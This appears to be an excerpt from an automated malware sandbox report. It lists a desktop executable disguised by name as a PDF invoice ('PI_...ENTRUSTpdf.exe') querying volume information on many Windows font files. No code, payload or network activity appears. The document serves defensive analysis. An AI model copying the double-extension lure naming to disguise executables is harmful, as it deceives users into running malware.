              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
